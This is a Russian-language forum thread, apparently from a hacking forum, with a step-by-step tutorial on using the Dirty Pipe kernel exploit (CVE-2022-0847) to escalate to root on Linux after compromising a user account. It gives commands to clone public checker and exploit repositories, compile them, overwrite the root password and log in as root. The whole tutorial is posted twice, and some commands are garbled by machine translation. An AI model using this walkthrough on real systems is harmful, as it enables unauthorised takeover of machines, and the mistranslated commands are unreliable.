Повышение привилегий: эксплойт Dirty Pipe для повышения привилегий в системах Linux

  • Автор темы Автор темы LeSh1y777
  • Дата начала Дата начала

LeSh1y777

Пользователь
Регистрация
25/9/25
Сообщения
5,682
Репутация
49
Лайки
153
Депозит
-8.95$
Добро пожаловать обратно, мои начинающие кибервоины!

Зачастую после успешного взлома системы мы ограничены привилегиями скомпрометированного пользователя. Обычные пользователи систем обычно имеют очень ограниченные привилегии и не могут получить доступ ко многим ресурсам или вносить изменения в свои системы и ресурсы (базы данных и т. д.). Это один из многих способов, которыми хорошие системные администраторы защищают свои сети.

6a4a49_f6f01fa72f5547de983f28ec8ce8ac6d~mv2.png
Несмотря на ограниченные привилегии, обычных пользователей обычно легче скомпрометировать, чем системного администратора, поскольку они, как правило, менее осведомлены о безопасности. Они более подвержены мошенническим ссылкам и другим атакам с использованием социальной инженерии и часто используют слабые пароли. По всем этим причинам вероятность компрометации обычного пользователя с ограниченными привилегиями гораздо выше, чем системного администратора с правами root или системного администратора. Чтобы получить контроль над системами и сетью, вам потребуется повысить привилегии до уровня системного администратора или root в системах Linux. Существует множество методов повышения привилегий, включая:

  1. Эксплойты ядра
  2. Неправильные конфигурации SUID/SGID
  3. судо
  4. команды с экранированными символами
  5. Эксплойты сервисов
  6. Слабые права доступа к файлам
  7. Переменные среды
  8. Злоупотребление предполагаемой функциональностью
В этом руководстве мы рассмотрим эксплойт DirtyPipe, позволяющий повысить привилегии в ядре. Он был обнаружен Максом Келлерманом и ему был присвоен идентификатор CVE-2022-0847.

DirtyPipe — это уязвимость локального повышения привилегий в ядре Linux, которая позволяет локальному злоумышленнику обойти ЛЮБЫЕ разрешения на доступ к файлам и записать произвольные данные в любой файл при определённых условиях. Это означает, что файлы, такие как /etc/shadow, где в системе хранятся хеши паролей, могут быть перезаписаны новым паролем.

Давайте протестируем эту потенциальную локальную уязвимость повышения привилегий в Kali 2021.

Шаг №1: Проверка на уязвимость

Первый шаг — определить, уязвимо ли ваше ядро Linux к Dirty Pipe. В данном случае я использую Kali 2021.

Мы знаем, что ядро Linux после версии 5.8 уязвимо, и эта уязвимость была исправлена в версии 5.16. Версию ядра Linux можно определить с помощью команды uname в Linux.

kali > uname -a

6a4a49_3643c2f5d8bb492c9542746b804a58fc~mv2.png
Как видите, эта версия Kali использует ядро Linux 5.10.0. Это может сделать её уязвимой к Dirty Pipe, поскольку этот релиз находится между первой уязвимой версией ядра и версиями с исправлениями! Для большей уверенности скачайте программу проверки DirtyPipe. Она доступна по адресу https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker

kali > sudo git clone https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker

6a4a49_3288e06bc2694e6fa713295b39503243~mv2.png
Далее перейдите в новый каталог.

kali> cd CVE-2022-0847-dirty-pipe-checker

Теперь выполните скрипт dpipe.sh

kali > sudo dpipe.sh

6a4a49_ad1931cf1c494041b30719dbf4dd2487~mv2.png


Как вы можете видеть выше, эта проверка уязвимостей подтвердила, что это ядро Linux уязвимо для эксплойта повышения привилегий Dirty Pipe!

Шаг №2: Загрузите эксплойт

Теперь, когда мы знаем, что эта версия Linux уязвима, давайте попробуем воспользоваться ею, чтобы получить права root.

Сначала загрузите эксплойт;

kali > sudo git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

Далее перейдите в новый каталог.

Теперь, когда мы находимся в этом каталоге, давайте заглянем внутрь.

кали > ls -l

6a4a49_4ed15d98458c420fa08bdb921447a461~mv2.png
Как видите выше, есть два эксплойта и один скрипт компиляции. Чтобы использовать эти эксплойты, нам нужно запустить скрипт компиляции. Скрипт компиляции автоматически скомпилирует оба эксплойта.

кали > sudo ./compile.sh

6a4a49_e9dc7a38ffa84a90ae6a5630235e32ff~mv2.png
После этого оба эксплойта станут зелеными и будут готовы к выполнению.

Давайте сначала запустим exploit-1.

кали> sudo ./exploit-1

6a4a49_3148ab58b69d4cd3b1e510c2ca91b5e9~mv2.png


Кажется, это сработало и изменило пароль root на «piped»!

Шаг №3: Войдите в систему как пользователь root

Давайте теперь проверим, сможем ли мы войти в систему как root.

кали> су корень

Далее введите новый пароль «piped».

После этого введите команду Linux whoami;

#ктоами

корень

6a4a49_5754a62f0dc441d9b78c983f8fc885cd~mv2.png
Чтобы дополнительно убедиться, что у вас есть права root, попробуйте выполнить команду Linux id

#идентификатор

uid=0(корень) groups=0(корень), ……..

Успех! Теперь у вас есть права root в системе, и вы можете делать всё, что захотите!

Краткое содержание

Повышение привилегий — один из ключевых навыков пентестера/хакера. Во многих случаях мы эксплуатируем обычного пользователя, не имеющего привилегий, необходимых для получения контроля над системой/сетью. Эксплойт ядра DirtyPipe — отличный инструмент для повышения привилегий в системах Linux, выпущенных примерно в 2021–2022 годах.
 
Добро пожаловать обратно, мои начинающие кибервоины!

Зачастую после успешного взлома системы мы ограничены привилегиями скомпрометированного пользователя. Обычные пользователи систем обычно имеют очень ограниченные привилегии и не могут получить доступ ко многим ресурсам или вносить изменения в свои системы и ресурсы (базы данных и т. д.). Это один из многих способов, которыми хорошие системные администраторы защищают свои сети.

6a4a49_f6f01fa72f5547de983f28ec8ce8ac6d~mv2.png
Несмотря на ограниченные привилегии, обычных пользователей обычно легче скомпрометировать, чем системного администратора, поскольку они, как правило, менее осведомлены о безопасности. Они более подвержены мошенническим ссылкам и другим атакам с использованием социальной инженерии и часто используют слабые пароли. По всем этим причинам вероятность компрометации обычного пользователя с ограниченными привилегиями гораздо выше, чем системного администратора с правами root или системного администратора. Чтобы получить контроль над системами и сетью, вам потребуется повысить привилегии до уровня системного администратора или root в системах Linux. Существует множество методов повышения привилегий, включая:

  1. Эксплойты ядра
  2. Неправильные конфигурации SUID/SGID
  3. судо
  4. команды с экранированными символами
  5. Эксплойты сервисов
  6. Слабые права доступа к файлам
  7. Переменные среды
  8. Злоупотребление предполагаемой функциональностью
В этом руководстве мы рассмотрим эксплойт DirtyPipe, позволяющий повысить привилегии в ядре. Он был обнаружен Максом Келлерманом и ему был присвоен идентификатор CVE-2022-0847.

DirtyPipe — это уязвимость локального повышения привилегий в ядре Linux, которая позволяет локальному злоумышленнику обойти ЛЮБЫЕ разрешения на доступ к файлам и записать произвольные данные в любой файл при определённых условиях. Это означает, что файлы, такие как /etc/shadow, где в системе хранятся хеши паролей, могут быть перезаписаны новым паролем.

Давайте протестируем эту потенциальную локальную уязвимость повышения привилегий в Kali 2021.

Шаг №1: Проверка на уязвимость

Первый шаг — определить, уязвимо ли ваше ядро Linux к Dirty Pipe. В данном случае я использую Kali 2021.

Мы знаем, что ядро Linux после версии 5.8 уязвимо, и эта уязвимость была исправлена в версии 5.16. Версию ядра Linux можно определить с помощью команды uname в Linux.

kali > uname -a

6a4a49_3643c2f5d8bb492c9542746b804a58fc~mv2.png
Как видите, эта версия Kali использует ядро Linux 5.10.0. Это может сделать её уязвимой к Dirty Pipe, поскольку этот релиз находится между первой уязвимой версией ядра и версиями с исправлениями! Для большей уверенности скачайте программу проверки DirtyPipe. Она доступна по адресу https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker

kali > sudo git clone https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker

6a4a49_3288e06bc2694e6fa713295b39503243~mv2.png
Далее перейдите в новый каталог.

kali> cd CVE-2022-0847-dirty-pipe-checker

Теперь выполните скрипт dpipe.sh

kali > sudo dpipe.sh

6a4a49_ad1931cf1c494041b30719dbf4dd2487~mv2.png


Как вы можете видеть выше, эта проверка уязвимостей подтвердила, что это ядро Linux уязвимо для эксплойта повышения привилегий Dirty Pipe!

Шаг №2: Загрузите эксплойт

Теперь, когда мы знаем, что эта версия Linux уязвима, давайте попробуем воспользоваться ею, чтобы получить права root.

Сначала загрузите эксплойт;

kali > sudo git clone https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits

Далее перейдите в новый каталог.

Теперь, когда мы находимся в этом каталоге, давайте заглянем внутрь.

кали > ls -l

6a4a49_4ed15d98458c420fa08bdb921447a461~mv2.png
Как видите выше, есть два эксплойта и один скрипт компиляции. Чтобы использовать эти эксплойты, нам нужно запустить скрипт компиляции. Скрипт компиляции автоматически скомпилирует оба эксплойта.

кали > sudo ./compile.sh

6a4a49_e9dc7a38ffa84a90ae6a5630235e32ff~mv2.png
После этого оба эксплойта станут зелеными и будут готовы к выполнению.

Давайте сначала запустим exploit-1.

кали> sudo ./exploit-1

6a4a49_3148ab58b69d4cd3b1e510c2ca91b5e9~mv2.png


Кажется, это сработало и изменило пароль root на «piped»!

Шаг №3: Войдите в систему как пользователь root

Давайте теперь проверим, сможем ли мы войти в систему как root.

кали> су корень

Далее введите новый пароль «piped».

После этого введите команду Linux whoami;

#ктоами

корень

6a4a49_5754a62f0dc441d9b78c983f8fc885cd~mv2.png
Чтобы дополнительно убедиться, что у вас есть права root, попробуйте выполнить команду Linux id

#идентификатор

uid=0(корень) groups=0(корень), ……..

Успех! Теперь у вас есть права root в системе, и вы можете делать всё, что захотите!

Краткое содержание

Повышение привилегий — один из ключевых навыков пентестера/хакера. Во многих случаях мы эксплуатируем обычного пользователя, не имеющего привилегий, необходимых для получения контроля над системой/сетью. Эксплойт ядра DirtyPipe — отличный инструмент для повышения привилегий в системах Linux, выпущенных примерно в 2021–2022 годах.
спасибо, буду знать
 
не у всех есть привелегии
 
Назад
Сверху Снизу